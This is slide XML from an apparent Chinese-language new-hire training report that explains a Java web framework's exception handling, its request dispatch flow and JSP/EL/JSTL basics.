              <a:t>名稱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>裡面限制很多，檔名須按照國泰格式來寫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51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moduleException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡，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DBUtil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.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searchAndRetrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>判斷是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>OverCountLimitException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ModuleException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>丟回，傳入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rootExcepiton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en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>getMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>()-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>傳回詳細訊息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initCause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()-&gt;Initializes the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this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specified value. (The cause is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caused this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thrown.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就可取得這個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物件判斷是否為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OverCountLimitException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來決定顯示訊息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6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這張圖是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架構，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，也就是顯示畫面並且與使用者做第一線的互動</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http dispatcher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txbean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則是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，他們的工作類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>deliverer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，或者說交通警察的功能，幫忙把使用者要求的訊息傳遞給後端，或把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的訊息帶回來前端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Mod.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共用模組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則是屬於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，他們的工作就是邏輯的處理，或者資料庫的異動請求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6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:console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>“msgid”:“XXT00200_20171221_C1A7BD443E_“(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三個參數為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msgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”:““)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9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參數與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參數最後都會呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>setReturnMessage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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數進入判斷式執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多那個紅框的東西</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>產生一組代碼方便從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中找錯誤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73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最後都呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>forcedLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數設定一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>throwableInfo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console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出現自訂文字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37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小嘉和小偉是一對情侶，小玲和小銘也是一對情侶。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妙的是小嘉暗戀小銘，但她想要先等小玲和小銘分手之後，再離開小偉去追求小銘。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同時小玲也暗戀小偉，她也想要先等小嘉和小偉分手之後，再離開小銘去追求小偉。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於是小嘉在等小銘，小玲在等小偉，他們之間的四角關係永遠對解不開。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持續的佔住共用資源的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，其它等待此資源的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就一直等等等。 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C0E8F-CA2D-4E11-B7E5-34750C664BA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74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接下來要稍微介紹一下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ebaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的流程，首先在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啟動之後，會先將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做初始化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web.xml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Log4jAwareDispatche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，這個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裡面會進行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，裡面有個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>會清除快取，並且儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，裡面就是儲存主程式的相關資訊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完成之後就會處於等待狀態，等待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的進入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breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 40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BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 54 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alwaysClearCache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59(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TW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m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):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清掉快取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儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃過所有檔案，儲存相關資訊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Init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完接著進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request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4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的傳入，也就是使用者作出了請求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我們需要取得一串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才能對應到正確的程式與方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般情況下，我們要前往另一個頁面會直接給定一個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，例如利用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來導頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比較特別的是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不像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接給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，因此需要其他方法取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request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前面的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取得方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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/XXWeb/servlet/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${dispatcher}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??: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include file=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“/html/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cathaybk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/common/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header.jsp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CXL:csCommon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“dispatcher” /&gt;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taglib uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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“/CXL” prefix=“CXL” %&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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it-IT" altLang="zh-TW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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csCommon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>對應到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&lt;tag-class&gt;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com.cathay.common.tag.cs.CsCommonTag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&lt;/tag-class&gt;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strContext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Attr.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=&gt;&gt;(/XXWeb + /servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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67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</a:t>
            </a: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err="1" smtClean="0"/>
              <a:t>CSRUtil.AjaxHandler.request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡調用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>jQuery or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529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CSRUtil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421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傳到後端找到對應的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&lt;servlet-name&gt;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10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之後，要將這串網址傳給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Container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>會利用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去尋找對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，例如這邊就是對應到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>httpdispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，所以她就會去呼叫這個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因為有點好奇怎麼呼叫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，因此有去看底層程式碼的運作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1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request: breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 157(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doPost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HttpDispatcher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70(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m_requestHandler.doTrx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上面雖然是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，但是底層還是都用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doGet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HtmlRequestHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 126(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141: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aconst_null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RequestHandler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137</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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144: aload_1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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55(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super.doAction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BeanProxy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114(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getBeanDescByAnnotation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呼叫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123(response =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handler.execute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(request,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m_beanName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);)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TxHandler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249(251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空白行進入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dirty="0" err="1" smtClean="0"/>
              <a:t>TxBean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 148 (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=….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XXT0_0200 55(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)&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>trx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;mod&gt;&gt;….. &gt;&gt;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回傳繼續執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>沒找了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0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這邊我們用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來做舉例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用者再前端操作，傳送一個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，透過剛剛介紹的方法利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>annotation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找到對應的程式名稱與方法後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(XXT0_0200)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，程式就會呼叫對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，並且將資料傳送給他，讓她進行驗證處理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接著</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再把資料傳給對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，讓他對資料庫進行操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主程式回傳結果會丟到上一頁最後的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>response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4A15D-43C4-42BC-8F47-5807BA1798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3599-4928-4429-A382-741AC1E59060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20C4-D4EB-4537-A7BC-8E2745466239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7E15-CBC9-47E1-AA69-A01228C8EF01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84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AEC-30CE-4A07-AC0B-4D6BCD54D0BD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D0-6F69-40EC-8AA9-4FFE5A102CC3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C931-9DC5-4ABF-8DCA-8BBE3F617477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8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C54A-ACC3-4686-84EC-F9F058C32A9A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7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B97C-30FA-40BF-9872-A15A175529D6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8779-660B-49ED-B3A4-B4B80A4852E9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00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0A71-EAFD-454E-9F15-E586F10C3B32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918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FF6C-72F8-4950-97A4-DAB005426392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74A4-9D60-403E-8A2E-D9F2678C6051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C5C8-29FC-4EC6-A499-8478B58CD733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1A1F-79F1-49CF-853D-D1397560FBEE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79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8EF6-C4FD-4B4A-B377-298EF2226075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557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99B8-2CC1-4E7C-AF77-180B43B87FD4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27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E9B-5CD9-48CF-8810-1DA5EA6F19A0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6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7706-E8F9-48F6-958F-DC58D8E21745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22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1CD5-15BF-4ABD-919A-3505D55C35C9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02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6DD-777C-4E80-8504-098F2F75524D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7FCC-AD15-4F4C-B295-9AC75652C140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2008-7F61-4808-9A04-90DC00B62E45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9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131-82BC-4923-BBA3-FD2C40C45BA1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8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7E91-0906-445E-9E52-424DB30D1E26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AFE4-9E20-4D4D-8074-AAD2008DA0C6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21ED-8032-43EF-8340-7F1D41F5CF51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31-B819-48C7-BC38-ECC01B4EC995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A862-7710-4DFB-B309-C6A6FDF48134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23D6-26FC-4B5A-B693-B3FDD0C60A2A}" type="datetime1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A78B9C-461C-4D07-92C0-6864CF8B08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/>
              <a:t>新人期末報告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開發一科 盛昱叡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0280083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0737175" y="5040023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1290485" y="5015330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527082" y="3616037"/>
            <a:ext cx="753001" cy="1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9492298" y="3908872"/>
            <a:ext cx="787785" cy="1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10347278" y="5393629"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30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字方塊 30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32" name="圓角矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361483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86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XXT00200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837981" y="4390639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XXT0_0200_mod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0007227" y="4399543"/>
            <a:ext cx="1938093" cy="584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XX_CARS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JSTL&amp;EL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0397" y="3985974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JSP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39738" y="3983934"/>
            <a:ext cx="186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Standard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97735" y="3961112"/>
            <a:ext cx="81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Tag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5498" y="3991056"/>
            <a:ext cx="146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Library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904" y="4585297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Java Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pages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54885" y="4015946"/>
            <a:ext cx="418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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Expression Language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靜態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTML: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JSP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Scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>person.getAge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() 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Directive: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;%@ page language="java" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>contentType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=….%&gt;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EL: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>person.age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Action: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp:getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> property = “age” name=“person”/&gt;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51" y="1690688"/>
            <a:ext cx="2723285" cy="95204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0566" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包裝常用方法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c:out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param.out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default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"out missing" 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endParaRPr lang="en-US" altLang="zh-TW" i="1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value - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>要輸出的內容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smtClean="0"/>
              <a:t>default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>裡面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>EL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>沒有值的時候，顯示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>預設值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escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>是否要把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>輸出特殊標籤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(encoding)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3F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fmt:parseDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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parseDate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"2013-10-14 10:00:00" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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parseLocale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nsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Asia/Taipei" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>庫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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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"foo" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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${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fn:escapeXml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param.foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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)}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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TW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altLang="zh-TW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2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Exception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82026" y="2190297"/>
            <a:ext cx="8592855" cy="4060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140134" y="2535100"/>
            <a:ext cx="2505205" cy="792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60997" y="522016"/>
            <a:ext cx="378703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RuntimeException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673523" y="3099308"/>
            <a:ext cx="418160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ModuleException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673523" y="4532543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04543" y="2541791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DataNotFoundException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04543" y="4207623"/>
            <a:ext cx="3035475" cy="111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ErrorInput</a:t>
            </a:r>
            <a:endParaRPr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673523" y="4765140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673523" y="5014615"/>
            <a:ext cx="303547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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOException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39" name="肘形接點 38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="2540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5" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931505"/>
            <a:ext cx="1028184" cy="2058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29" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="22908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26" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7855129" y="3099308"/>
            <a:ext cx="849415" cy="4572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27" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7855129" y="3556508"/>
            <a:ext cx="849415" cy="1208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1" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2645339" y="979216"/>
            <a:ext cx="1015658" cy="1952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23" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="625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382025" y="297262"/>
            <a:ext cx="8592855" cy="138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圓角矩形 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3660997" y="47787"/>
            <a:ext cx="2401600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UnChecked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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673523" y="2014211"/>
            <a:ext cx="2389074" cy="400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Checked Exception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423" y="59595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Try{…}catch{…}finally{…}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11" y="1783011"/>
            <a:ext cx="8934253" cy="491145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171167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JSP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40049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主程式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308931" y="546485"/>
            <a:ext cx="1453019" cy="8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>
            <a:off x="1102290" y="2379945"/>
            <a:ext cx="250521" cy="416735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>
            <a:off x="1059140" y="2771628"/>
